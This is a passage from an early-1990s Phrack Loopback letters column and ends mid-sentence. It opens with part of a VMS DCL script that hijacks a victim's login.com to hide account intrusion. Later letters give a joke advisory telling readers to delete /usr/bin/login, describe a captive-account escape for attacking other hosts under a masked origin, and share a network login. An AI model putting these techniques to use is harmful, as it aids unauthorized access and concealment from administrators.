$if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)"
$goto from_change
$aborted:
$!if f$search("users.dat") .nes. "" then close io1
$!if f$search("users.dat") .nes. "" then delete users.dat;*
$!if f$search("users2.dat") .nes. "" then close io2
$!if f$search("users2.dat") .nes. "" then delete users2.dat;*
$close io1
$close io2
$delete users.dat;*
$delete users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the section of the program which is executed in place of the !!!!
!!!! users login.com. It does grab their login and execute it to prevent  !!!!
!!!! suspicion, but there are a couple of hidden commands which are also  !!!!
!!!! added. They redefine the show and sys commands so that the user can  !!!!
!!!! not detect that he or she is riding off of another account.          !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$other:
$sh$ = "@instaar_device:[miller_g]findnext show"
$shline = "$sh*ow ==" + sh$
$logi = ""
$logi = f$search("login.com")
$if logi .NES. "" then goto Ylogin
$nologin:
$open/write io login2.com
$write io shline
$close io
$@login2
$delete login2.com;*
$exit
$ylogin:
$open/write io2 login2.com
$open/read io1 login.com
$transfer_loop:
$read/end_of_file=ready io1 line
$write io2 line
$goto transfer_loop
$ready:
$write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""
$close io1
$close io2
$@login2
$delete login2.com;*
$exit


[Editor:  Thanks for the letter and program.  I wish I could bring
          myself to use a VMS and try it out.  :)  Always happy
          to get notice that somewhere out there a female reads
          Phrack.  By the way, "innocent female" is an oxymoron.]

****************************************************************************

To:   Phrack Loopback.
From: White Crocodile.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports"  is
 really cool invention and I (sorry for egoisthic "I") with  pleasure
 wasting time for his reading ( ex. my playboy time ). But  here  for
 some unknown reason appear equal  style,  and  all  loopback  remind
 something medium between "relations search" [Hello Dear Phrack, I am
 security expert of our local area, but when I looked  to  output  of
 "last" program (oh,yeah - "last" it is ...), I ocassionaly  under  -
 standed  what apparently someone elite  hacker  penetrated  into  my
 unpassworded  account!  But  how  he  knew  it???  I  need  to  talk
 with him! Please mail me at security@...] and "make yourself" [Yep.I
 totally wrote program which gets file listing from target  vicitim's
 home directory in current host. After that I decided  to  contribute
 it for You. I hope this will help. Here is the complete C code. "rx"
 permission in target's '$HOME' required.].
  Looking similar articles like "... off Geek!" and  various  reports
 which don't reacheds PWN. [CENSORED BY ME].
  Resulting from abovewritten reason and I let  myself  to  add  some
 elite (oops word too complex), some bogus and little deposit to Your
 lb. He written in classic plagiarize style.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                             *  *  *
Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what
it is horrible (don't read it please - this message to Bart),  but  I
doing it all the time (today already 3 month). I have not much time to
write, and here is the subject - I broke into  one  military  computer
and stole their mail about new security bug!!! l00k f3r |t:

                                - - -
          DDN & CERT
                            SPECIAL REPORT*
          Sun 3.x,4.1.x login flaw

Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX
                                       and many yet unknown systems)

Impact: Allow random intruders to gain "root" access.

Description:
   The huge security hole was there and waiting! Type:

     $ login root

   [ no option required ], and You are! All what You need to know its
   just root's password, but it (pw), sure, can be easily obtained from
   real root, by asking him (root). Ex - "$ talk root"

Possible fix until copyrighted patch come out:

     #rm /usr/bin/login
     #cp /usr/games/fortune /usr/bin/login

If you believe that your system has been compromised, contact CERT CC. Call
our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in  time
of "Silence of the Lamb"), leave Inet address of your system and  number of
private credit card.
                               - - -

* Report not will be printed in cert advisories in this form, becouse FBI
   need remove all hints and tips, and make him useless to intruders.

DISCLAIMER: Above document written by CERT, DDN and FBI -
                                      all pretension to them.

Thanks to gr*k (I can't write his full name for security reasons),roxtar,
y0,Fidelio,2 scotts from Santafe,KL (He not have attitude  towards  this
mail,but I included him for polite since he reserved tickets for me  to
SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for
hints to me, what this bug really exist (Yep, before I stoled report).

 - Write You later - anonymous.

P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK
and sure Erik Bloodaxe. And also - IF after E911 incident you are more
carefully, feel free to replace "stole" to "got" (when you'll post it),  and
do not forget to add "reprinted with permission".

 - Sincerely, anonymous.

----------------------------------------------------------------------

[Editor:  More indications that we will all be raided by the DEA
          more often than the FBI in coming years.]

*****************************************************************************


 "Since my probation status forces me to be adamant about this. Illegal
  activities on Netsys cannot and will not be tolerated. Prison sucked."

                                    - Len Rose

 06/6/93

 NETSYS COMMUNICATION SERVICES  Palo Alto, California

 Netsys is a network of large Sun servers dedicated to providing
 Internet access to individuals and corporations that need solid,
 reliable Internet connectivity.  Netsys is at the hub of major
 Internet connectivity.

 Netsys is a system for professionals in both the Internet and Unix
 community. The public image is important to us. Illegal activities
 cannot be tolerated.

 Netsys has every feature you could possibly need.

 Netsys is lightly loaded, extremely reliable and dedicated to providing
 full time 24 hour Internet access.

 Support: 24 hour emergency response service.

 Dialups: Palo Alto area, High Speed (V.32 and PEP)

 Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes)

                   $1 per megabyte per month over 5 megabytes.

 Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes)
                      $1 per megabyte per month over 10 megabytes.

 Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic
            newsgroups, and including all foreign newsgroups.

               SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE

 Satellite Weather: Netsys has available real time satellite weather
                    imagery. Images are available in gif, or Sun raster
                    format. Contact us for NFS mirroring, and other special
                    arrangement. These images are directly downlinked from
                    the GOES bird. Contact Steve Eigsti (steve@netsys.com)

 Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service

                   for large volume news distribution. Members of Netsys
                   can obtain substantial discounts for the purchase and
                   service costs of this revolutionary method of Usenet news
                   distribution.  Both Unix and MS Windows software available.
                   Contact (pagesat@pagesat.com) for product information.

 Paging Services: Netsys is offering Pagesat's Internet to Pager mail service.
                  Members of Netsys can obtain critical email to pager
                  services. Pagesat has the ability to gateway any critical
                  electronic mail to your display pager.

                      Leased Line Internet Connections

  Pagesat Inc. offers low cost 56k and T1 Internet connections all over the
  United States. Since Pagesat is an FCC common carrier, our savings on
  leased lines can be passed on to you. For further information, contact
  Duane Dubay (djd@pagesat.com).

 We offer other services such as creating domains, acting as MX
 forwarders, and of course uucp based newsfeeds.

 Netsys is now offering completely open shell access to Internet users.
 For accounts, or more information , send mail to netsys@netsys.com

 Netsys will NEVER accept more members than our capacity to serve.

 Netsys prides itself on it's excellent connectivity (including multiple T1's,
 and SMDS), lightly loaded systems, and it's clientele.

 We're not your average Internet Service Provider. And it shows.
--------------------------------------------------------------------
[Editor:  We here at Phrack are forever in debt to Mr. Len Rose for
          allowing us to use ftp.netsys.com as our new official FTP
          site after getting the boot off EFF.  It takes a steel
          set of huevos to let such an evil hacker publication
          reside on your hard drive after serving time for having
          dealings with evil hackers.  We are STOKED!  Thanks Len!
          Netsys is not your average site, INDEED!]

****************************************************************************

Something Phrack might like to see:

The contributors to and practices of the Electronic Frontier Foundation
disclose quite accurately, just who this organization represents.  We
challenge the legitimacy of the claim that this is a "public interest"
advocate.  Here is a copy of their list of contributors:

[FINS requested the Office of the Attorney General of the Commonwealth of
Massachusetts to provide us with a list of contributors of over $5000, to
the Electronic Frontier Foundation, required by IRS Form 990.  Timothy E.
Dowd, of the Division of Public Charities, provided us with a list (dated
January 21, 1993), containing the following information.  No response was
given to a phone request by FINS directly to EFF, for permission to inspect
and copy the most current IRS Form 990 information.]



                  ELECTRONIC FRONTIER FOUNDATION, INC.
              IRS FORM 990. PART I - LIST OF CONTRIBUTIONS


NAME AND ADDRESS OF CONTRIBUTOR       CONTRIBUTION
                                    DATE      AMOUNT

Kapor Family Foundation
C/O Kapor Enterprises, Inc.
155 2nd Street
Cambridge, MA 02141                Var       100,000

Mitchell D. Kapor
450 Warren Street
Brookline, MA 02146                Var       324,000

Andrew Hertzfeld
370 Channing Avenue
Palo Alto, CA 94301                12/12/91    5,000


Dunn & Bradstreet
C/O Michael F. ...
1001 G Street, NW Suite 300 East
Washington, DC 20001               02/12/92   10,000

National Cable Television
1724 Massachusetts Avenue, NW
Washington, DC 20036               02/18/92   25,000


MCI Communications Corporation
1133 19th Street, NW
Washington, DC 20036               03/11/92   15,000

American Newspaper Publishers
Association
The Newspaper CTR
11600 Sunrise Valley
Reston, VA 22091                   03/23/92   20,000

Apple Computer
20525 Mariani Avenue MS:75-61
Cupertino, CA 95014                03/23/92   50,000

Sun Microsystems, Inc
c/o Wayne Rosing
2550 Garcia Ave
Mountain View, CA 94043-1100       04/03/92   50,000

Adobe Systems, Inc.
c/o William Spaller
1585 Charlestown Road
Mountain View, CA 94039-7900       04/16/92   10,000

International Business Systems
c/o Robert Carbert, Rte 100
Somers, NY 10589                   05/07/92   50,000

Prodigy Services Company
c/o G. Pera...
445 Hamilton Avenue
White Plains, NY 10601             05/07/92   10,000

Electronic Mail Associates
1555 Wilson Blvd. Suite 300
Arlington, VA 22209                05/13/92   10,000

Microsoft
c/o William H. Neukom
1 Microsoft Way
Redmond, VA 98052                  06/25/92   50,000

David Winer
933 Hermosa Way
Menio Park, CA 94025               01/02/92    5,000

Ed Venture Holdings
c/o Ester Dvson
375 Park Avenue
New York, NY 10152                 03/23/92   15,000

Anonymous                          12/26/91   10,000

Bauman Fund
c/o Patricia Bauman
1731 Connecticut Avenue
Washington, DC 20009-1146          04/16/92    2,500

Capital Cities ABA
c/o Mark MacCarthy
2445 N. Street, NW Suite 48
Washington, DC 20037               05/04/92    1,000

John Gilmore
210 Clayton Street
San Francisco, CA 94117            07/23/91    1,488
                                   08/06/91  100,000

Government Technology              10/08/91    1,000

Miscellaneous                      04/03/91      120

Apple Writers Grant
c/o Apple Computer
20525 Mariani Avenue               01/10/92    15,000


[Editor:  Well, hmmm.  Tell you guys what:  Send Phrack that
          much money and we will give up our ideals and move to
          a new location, and forget everything about what we
          were all about in the beginning.  In fact, we will turn
          our backs on it.  Fair?

          I was talking about me moving to Europe and giving
          up computers.  Don't read anything else into that.  Nope.]

****************************************************************************

-----BEGIN PGP SIGNED MESSAGE-----

Q1: What cypherpunk remailers exist?

A1:

 1: hh@pmantis.berkeley.edu
 2: hh@cicada.berkeley.edu
 3: hh@soda.berkeley.edu
 4: nowhere@bsu-cs.bsu.edu
 5: remail@tamsun.tamu.edu
 6: remail@tamaix.tamu.edu
 7: ebrandt@jarthur.claremont.edu
 8: hal@alumni.caltech.edu
 9: remailer@rebma.mn.org
10: elee7h5@rosebud.ee.uh.edu
11: phantom@mead.u.washington.edu
12: hfinney@shell.portal.com
13: remailer@utter.dis.org
14: 00x@uclink.berkeley.edu
15: remail@extropia.wimsey.com

NOTES:
#1-#6  remail only, no encryption of headers
#7-#12  support encrypted headers
#15  special - header and message must be encrypted together
#9,#13,#15 introduce larger than average delay (not direct connect)
#14  public key not yet released

#9,#13,#15      running on privately owned machines

======================================================================

Q2: What help is available?

A2:

Check out the pub/cypherpunks directory at soda.berkeley.edu
(128.32.149.19).  Instructions on how to use the remailers are in the
remailer directory, along with some unix scripts and dos batch files.

Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions.

======================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.2

iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9
lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI
Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy
Y6Zv0kk/7rs=
=simY
-----END PGP SIGNATURE-----

[Editor:  We suggest that everyone go ahead and get the info file from
          soda.berkeley.edu's ftp site.  While you are there,
          take a look around.  Lots of groovy free stuff.]
 


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 3 of 27

                                Phrack Loopback
                                    Part II

======================================================================
                      ToneLoc T-Shirt Offer
======================================================================

Yes, the rumors are true: A ToneLoc t-shirt is at last available.

The shirt is an extra large, 100% cotton Hanes Beefy-T, silk screened
with four colors on front and eight colors on back.

The front features an "anti-bell" logo, with your favorite corporate
symbol in blue under a slashed circle in red. The ToneLoc logo appears
above, with an appropriate quote below.

The back has six Tonemaps, visual representations of exchange scans,
contributed by ToneLoc'ers from around the globe. The exchange and
scanner's handle is printed below each Tonemap. The handles of the beta
testing team are listed below the maps.

If you act now, a free copy of the latest release of ToneLoc will be
included with your order! Please specify 3.5" or 5.25" disks.

$15 postpaid; add $5 for international orders.
Make your check or money order payable to "ToneLoc Shirt."

Send to:

ToneLoc Shirt
12407 Mopac Expwy N #100-264
Austin, TX  78758
Voice Mail (24 hours): 512-314-5460

- Mucho Maas
- Minor Threat


[Editor:  I have one of these.  The only hacker program immortalized in
          cotton.  Nifty!]

******************************************************************************

 The return of a telecom legend...


 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
 &&  &&&&&&&  &&&&&          &&&&&&&&&&&  &&&&&&&&&  &&&&&&&&&&&&&&   &&&&&&&&
 &&   &&&&&   &&&&&&&&&  &&&&& &&&&&  &&  &&&&&&&&    &&&&&&&&&&&&&    &&&&&&&
 &&    &&&    &&&&&&&&&  &&&&   &&&&  &&  &&&&&&&  &&  &&&&&&&&  &&  &  &&&&&&
 &&  &  &  &  &&&&&&&&&  &&&  &  &&&  &&  &&&&&&&  &&  &&&&&&&&  &&  &&  &&&&&
 &&  &&   &&  &&     &&  &&  &&&  &&  &&  &&&&&&&  &&  &&&&&&&&  &&  &&&  &&&&
 &&  &&& &&&  &&  &&&&&  &&  &&&  &&  &&  &&&&&&&  &&  && &&&&&  &&  &&&&  &&&
 &&  &&&&&&&  &&  &&&&&  &&  &&&  &&  &&  &&&&&&&  &&  &&  &&&&  &&  &&&&&  &&
 &&  &&&&&&&  &&  &&&&&  &&       &&  &&  &&&&&&&  &&  &&   &&&  &&  &&&&&  &&
 &&  &&&&&&&  &&  &&&&&&&&&  &&&  &&  &&  &&&&&&&  &&  &&    &&  &&  &&&&  &&&
 &&  &&&&&&&  &&  &&&&&&&&&  &&&  &&  &&       &&      &&  &  &  &&  &&&  &&&&
 &&  &&&&&&&  &&    &&&&&&&  &&&  &&  &&&&&&&&&&&  &&  &&  &&    &&  &&  &&&&&
 &&  &&&&&&&  &&  &&&&&&&&&  &&&  &&  &&&&&&&&&&&  &&  &&  &&&   &&  &  &&&&&&
 &&  &&&&&&&  &&     &&&&&&&&&&&&&&&  &&&&&&&&&&&  &&  &&&&&&&&  &&    &&&&&&&
 &&  &&&&&&&  &&&&&&&&&&&&&&&&&&&&&&          &&&&&&&&&&&&&&&&&& &&   &&&&&&&&
 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&


                          S  O  U  T  H  W  E  S  T

                A Neon Knights/Metal Communications Experience

                                     cDc
                                    _   _
                                   ((___))
                                   [ x x ]
                         cDc        \   /        cDc
                                    (' ')
                                     (U)

              '..and none but the Bovine survived the onslaught'

                     -cDc-   CULT OF THE DEAD COW   -cDc-
                              cDc communications
                         -cDc-   D0PE SYSTEM   -cDc-
                         ---------------------------

                                  Very K-Rad
                                 713-468-5802
                                No Lame Ratios
                               Running Baphomet
                              Sysd00d : Drunkfux
                             86,400 Seconds A Day
                            OoOOooOdlez o' T-Files
                           The Official HoHoCon BBS
                          New Pimping Tips Every Day
                         Tonz o' Nifty Ascii Pictures
                        Talk To Satan Himself.. Live!!
                       Free 5-Digit Metro K0DEZ For All
                      d0Pe Gifs Of Gail Thackeray Online
                     Read Hate Filled Nazi Skinhead Poemz
                    Home Of K-RAP : The K-Rad Ascii Possee
                   Learn How To Make Money! Just Ask Byron!
                  Necropheliacs & Kidporn Kollekt0rz Welcome
                 Y0 Y0 Y0 Lonely D00dz! We gotz girlie uzerz!
                Lots Of Message Bases With Really K-KeWL Names
               Is This Whole "Volcano Ad" Thing Stupid Or What?
              GNU Warez From The Future! We Have A Time Machine!
             I Think We Have One Of Those Big, EL8 Drive Thingies
            No Net Access? Submit Your cDc & Phrack Articles Here!
           The Only System Authorized By The Debbie Gibson Fan Club
          The Neon Knights Did NOT Die, We Just Went Way Underground
         This Thing Is Starting To Look Like That Album St0nerzz Like
        Mega KooL Games Like Lemonade Stand And Hunt The Wumpus Deluxe
       Hey! It's The Mashed Potato Mountain Thing From Close Encounters
      Users Include Lots Of Elite Peoplez You See On Shows Like Dateline
     That Really Trendy Super High Speed Modem All Those Warez DooDz Have
    cDc / CuD / dFx / Neon Knights / NIA / Phrack / uXu / Video Vindicator
   Telco / Systems / Networks / Security / Cellular / Satan / Death / K0DEZ

***************************************************************************

Hi there!

As a beginner in Cyberspace & a new reader of Phrack, I just wanna say thiz...
IT'S X-CELLENT DUDES!!!!!.

Keep the good work!!!!!.

I only have your latest issue, and I never read previous ones, so this
is maybe old stuff... but I would like to see the Infonet network and
Datapac covered in some of UR articles... let me know if u published something
in recent issues.

Greetings from South America,

LawEnforcer.
(yes, it's an Alias!!!)

[Editor:  Well, InfoNet we've never done.  Any takers?  Datapac I
          personally scanned some time ago, but almost ALL of the
          100K of NUA's I found still work.  Maybe someone should
          take my script and re-scan it.  Anyone?  Class?  Bueler?]

****************************************************************************

begin contribution-------------------------------
VMS machines that have captive accounts often have accounts such as HYTELNET.
This is an account which will archie for you, or take you to a few select BBSs
or any of many boring things to do.  You simply log in as HYTELNET, there isn't
a password, and go through the menus.  Now, that's where the fun begins.  If
you use HYTELNET to telnet anywhere, while it is connecting, simply  type your
local telnet escape key (something like ^\ or ^]) and then........you have a
telnet prompt.  Unfortunately, if you close or disconnect, it will return to
the HYTELNET menus, and you can't open a new connection, since you're already
connected.  So, what you do is SPAWN whatever process you want.....you could
SPAWN TELNET or SPAWN FTP or SPAWN anything else for that matter.  SPAWN with
no arguments (the shell escape) does not work, however.  This works from any
captive account that telnets.  So, you can telnet to a VAX that has HYTELNET,
log in as HYTELNET, do what I told you, and then hack to wherever, since the
reports from the target site will show that HYTELNET@insert.vax.site committed
the heinous crimes that you did.
                                                  Kaneda
end contribution--------------------------------

[Editor:  Kaneda:  thanks for that tidbit.  Now I'm sure to get grief
          on IRC from someone coming from an odd site.  :)
          Give my regards to Tetsuo.  "But some day...we will be"]

****************************************************************************

  _   _
 ((___))
 [ x x ] cDc communications
  \   /  Global Domination Update
  (' ')  #12 - April 1st, 1993
   (U)
Est. 1986

 New gNu NEW gnU new GnU nEW gNu neW gnu nEw releases for April, 1993:

 _________________________________/Text Files\_________________________________

221: "Sickness" by Franken Gibe.  Paralyzed by thoughts.  Rage!  Fight!  Dark!

222: "A Day in the Life of Debbie G1bs0n" by The Madwoman.  The pop idol faces
her arch enemy on the fields of ninja combat and in the arms of love.

223: "The B!G Envelope Stuffing Scam" by Hanover Fiste.  How to get money.
Make Sally Struthers proud of you.

224: "The Bird" by Obscure Images.  Story 'bout a sad guy who laughs at birds.
It's depressing.  Oi's a kooky guy.

225: "Tequila Willy's Position Paper" by Reid Fleming and Omega.  Unknown to
most, Tequila Willy thew his hat in the ring for the 1992 presidential
election.  Here's the paper detailing his positions on all the important
issues.  Better luck in '96, eh?

226: "Simple Cryptology" by Dave Ferret.  Introductory guide to cryptology
which also includes a good list of other sources to look into.

227: "Big Ol' Heaping Pile of Shit" by Suicidal Maniac.  Buncha poems about
lots of things.  Wacky.

228: "ISDN: Fucking the Vacuum Cleaner Attachments" by Reid Fleming.  Intended
for _Mondo 2000_, this file drops science about everyone's favorite future
phone system.

229: "The Evil Truth About Peter Pan" by Lady Carolin.  It's a whole mess of
things you and your puny little mind might not have noticed about this popular
kiddie (hah!) story.

230: "The 2:00 O'Clock Bus" by Tequila Willy and Bambi the Usurper.  Geriatric
porn with some doggy flavor.

 _____________________________/Other Stuff to Get\_____________________________

From: cDc communications/P.O. Box 53011/Lubbock, TX  79453

This is Swamp Ratte's stuff:

     All the cDc t-files on disk by mail, for convenience sake!  Specify
     MS-DOS or Apple II format 3.5" disks.  $3.00 cash.

     cDc stickers!  Same design as were flying around at HoHoCon, with the
     scary-lookin' cow skull.  k00l.  Send a SASE and 50 cents for a dozen of
     'em (or just send a dollar).

     Weasel-MX tape!  _Obvious_ 45-minute cassette.  This is Swamp Ratte's
     funk/punk-rock/hip-hop band.  It's a mess, but fun.  $3.00 cash.

     cDc hat!  Yeah, get yer very own stylin' black baseball cap embroidered
     with the cDc file-header-type logo on the front in white.  This isn't the
     foam-and-mesh cheap kind of hat; it's a "6-panel" (the hat industry term)
     quality deal.  Roll hard with the phat cDc gear.  $15.00 plus a buck for
     postage.

     _Swingin' Muzak_ compilation tape!  An hour of rockin' tuneage from
     Weasel-MX (all new for '93), Counter Culture, Acid Mirror, Truth or
     Consequences, Grandma's V.D., and Sekrut Squirrel.  Lotsa good, catchy,
     energetic stuff for only $5.00 cash.
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: FNORD! Publications/2660 Trojan Dr. #912/Green Bay, Wisconsin 54304-1235

This is Obscure Images' stuff:

     FNORD! 'zine #1 & #4 - $2.00 Each

     Shoggoth 912 #1 - $0.75

     For some snarly techno grooves, send away for the new tape from Green
     Bay's finest (and only) technorave sensation, I OPENING!  IO-Illumination
     Demo Tape (7 songs of joy) - $5.00
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: Freeside Orbital Data Network/ATTN:dFx-HoHoCon-cDc/11504 Hughes Road #124
      Houston, TX  77089

This is Drunkfux's stuff:

     HoHoCon '92 T-Shirts : Black : XL : Elite : Stylish : Dope : Slammin'
     Only $15 + $2 shipping ($2.50 for two shirts).
     Your choice of either "I LOVE FEDS" or "I LOVE WAREZ" on front, where
     "LOVE" is actually a red heart, ala "I LOVE N.Y." or "I LOVE SPAM."
     On the back of every beautimus shirt is...

                                dFx & cDc Present

                                   HOHOCON '92

                                 December 18-20
                                 Allen Park Inn
                                 Houston, Texas

     HoHoCon '92 VHS Video : 6 Hours : Hilariously Elite : $18 + $2 Shipping

     Please make all checks payable to O.I.S.  Free cDc sticker with every
     order!  w0w!
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: Bill's Shirt Thing/P.O. Box 53832/Lubbock, TX/79453

This is Franken Gibe's stuff:

     AIDS sucks!  Order a catalog!  Nifty t-shirts that make you happy.
     Proceeds go to local AIDS Resource Center.  Send a $0.29 stamp for the
     cat'.
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: Teach Me Violence magazine/61 East 8th St./Suite 202/New York, NY  10003

This is The Pusher's stuff:

     Teach Me Violence 'zine:
     Issue #1 (Mr. Bungle, COC, Murphy's Law)
     Issue #2 (Helmet, Supertouch, Agnostic Front, American Standard)
     Issue #3 (Faith No More, Chris Haskett, Cathedral, Iceburn, Venom)
     $3.00 cash each
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: A Day In The Life Of.../P.O. Box 94221/Seattle, WA  98124

This is Lady Carolin's stuff:

     A Day In The Life Of... 'zine, free with two stamps.

     Bi-monthly contact list of girlie bands/grrrl bands/female vocalists.  $1.
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 __________________________________/cDc Gnuz\__________________________________

                           "cDc: savin' trees in '93"

Hiya once again, here's whassup:

NEW Internet FTP site: zero.cypher.com.  This is Drunkfux and Louis Cypher's
chilly-the-most deal.  Login as "anonymous" and get all the cDc stuph fast fast
fast.

NEW cDc Mailing list: Get on the ever-dope and slamagnifiterrific cDc mailing
list!  Send mail to cDc@cypher.com and include some wonderlessly elite message
along the lines of, "ADD ME 2 DA MAILIN LIZT!!@&!"

NEW Official cDc Global Domination Factory Direct Outlets:
Cyberspace.Nexus               +31-67-879307 [Belgium]
Mirrorshades BBS               903/668-1777
The Ministry of Knowledge      401/043-3446
The Crowbar Hotel              713/373-4031

We're always taking t-file submissions, so if you've got a file and want to
really get it out there, there's no better way than with cDc.  Upload text to
The Polka AE, or my Internet address, or send disks or hardcopy to the cDc post
office box in Lubbock, TX.

NEW updated CDCKC0W.TXT file.  All the information for sysops to get going
running Factory Direct Outlets.  It should be available from wherever you got
this Update.

NEW CDCV9.ZIP is out containing cDc t-files 201-225.  Factory Direct Outlet
sysops should get this and put it up on their systems.

See ya in May.

S. Ratte'
cDc/Editor and P|-|Ear13zz |_3@DeRrr
"We're into t-files for the girlies and money."

Write to: cDc communications, P.O. Box 53011, Lubbock, TX  79453.
Internet: sratte@cypher.com, sratte@mindvox.phantom.com.


[Editor:  Whew.  Any word on those cDc Glow in The Dark Toilet
          Seat Covers?  I've got my 29.95 ready!]

****************************************************************************

Hey there a few of us use this account and wuld like to get phrack
sent to us here if at all possible... :)
We are all Australians and all read your magazine to death..
a friend of mine runs a board called shred til ya ded which is basically
a hpac and warez assortment... nothing 0 day but definately good for hacking
info... we are in the middle of getting all of your mags online at the moment
you mentioned in phrack 42 that you would like people from other countries
to write pieces about the scene there... well depending on the kind of thing
you want i would be more than happy to give it a go with some mates
thanks
Darkstar


[Editor:  Darkstar and anyone else--send me your files about your
          scenes in other countries.  Nearly everyone who promised me
          a file about their country flaked out.  You'll see who did
          send me a file later in this issue.  Other countries:  get
          off your duffs and send me a file!  We want to know what
          goes on there!  Boards, Busts, History, Hackers, Hangouts,
          Groups, Greats, Legends, Lore, EVERYTHING!]

***************************************************************************

I remember seeing a message somewhere on the WELL saying an issue of
Phrack carried listings of Viruses.  Could you tell me which one(s)?

Also, do you know of any sites which have virus listings archived ?

Thanks,

Jon Barber

[Editor:  Well, John, Phrack doesn't carry virii info.  You might
          check around for 40hex.  Personally, I think virii
          are vastly overrated hype driven onward by McAffee
          and other self-serving interests.  That is why we
          ignore them.  (That is also why I don't mention them
          when I lecture on computer security...they are no
          big thing.)]

****************************************************************************

Ok,

So I was reading Phrack 42's listing for SprintNET nodes... But there was
no information on how to access it..

What are the ACNS For the Sprintnet?  Is there a Phrack out that details
use of the SprintNET..

Would appreciate ANY and ALL, as I've never heard of it being used widely
like the Internet, and would like to know how to use it..

Jack Flash...

[Editor:  Jack...you kids are spoiled.  You and your Internet.  Hrumph.
          Remember when Arpanet was like a 20 or so Universities and
          Contractors, and tied to about 100 bases thru Milnet?  No?
          Sheesh.

          To answer your question, Sprintnet (used to be Telenet, and
          always will be to me) is a public packet switched network.
          It can be accessed in nearly EVERY city in the USA, and in
          many large cities in other countries.

          The Toll-Free dialups are:  300-2400:  800-546-1000
                                     9600 v.32:  800-546-2500

          At the TERMINAL= prompt, type D1.  Then to find a local
          dialup, at the @ prompt type MAIL.  Login as username
          PHONES password PHONES.]

*****************************************************************************

RE: Loop-Back

I was wondering if it would be possible for you to do something on Novell LAN
security, as we have one at my high school. I was also wondering about
bluebox tones...in my area, if you call  into the next county, sometimes you
hear what sounds like bluebox tones. I had thought these lines were digital,
and therefore, would not require tones of any type.. any ideas?

RF Burns

[Editor:  As for the Novell...check later in this issue.
          As for the MF tones...when calls go from one area to another
          it is quite common to hear multi-frequency tones.  Depending
          upon the way the call is routed, your particular pick of LD
          carrier and the equipment between you and the destination,
          you may hear these tones.  You may even be one of the lucky
          ones, and be able to seize a trunk.  Using certain LD carriers
          you can still box, but usually you are stuck with a trunk that
          can't get out of the area.  Alas.]

*****************************************************************************

Hi -

I'm a student in the MLS program here at SUNY Albany.  I
found out about Phrack while researching a paper for my public policy class,
on the ECPA and shit.

Well, I gave a fabulous 45-minute presentation on it all and then wrote
an even better paper for which I was rewarded with an A as well as an A
for the class.  Turns out John Perry Barlow and Mitch Kapor are heroes of
my professor as well.

So now I'm hooked.  For my thesis I'm writing a user manual for librarians
on the Internet and helping teach a class in telecommunications.

Just wanted to let you phrack-types know you're my heroes and I want to be
a member of the phrack phamily.  Can't send any money, though.  *:(

Keep the faith,
        hopey t


[Editor:  That's really great!  Usually profs are terribly anal about
          anything regarding Phrack and/or hacking.  You are very
          lucky to have had such an instructor.  Congrats on the
          class and good luck with your thesis!]

****************************************************************************

    Hi!
    I was just glancing through Phrack #42, and read the portion
that sez that all computer professionals (essentially) have to
delete this and even old copies of Phrack.
    Coupla questions: I'm a Network Administrator for a University,
do I have to comply? It's not like I am a thug from Bellcore or
anything like that. Although one of the things I am concerned with,
professionally, is the security of our systems, I am no Cliff Stoll.
If I were to catch an unauthorized visitor, I would give him the boot,
not chase him down with prosecution in mind.
    I have, of course, deleted all my old Phracks as well as #42,
but I would like to be able to re-snarf them. Let me know...
                                           Thanks!
                                           Dan Marner

[Editor:  Well, Dan, technically Phrack could quite possibly
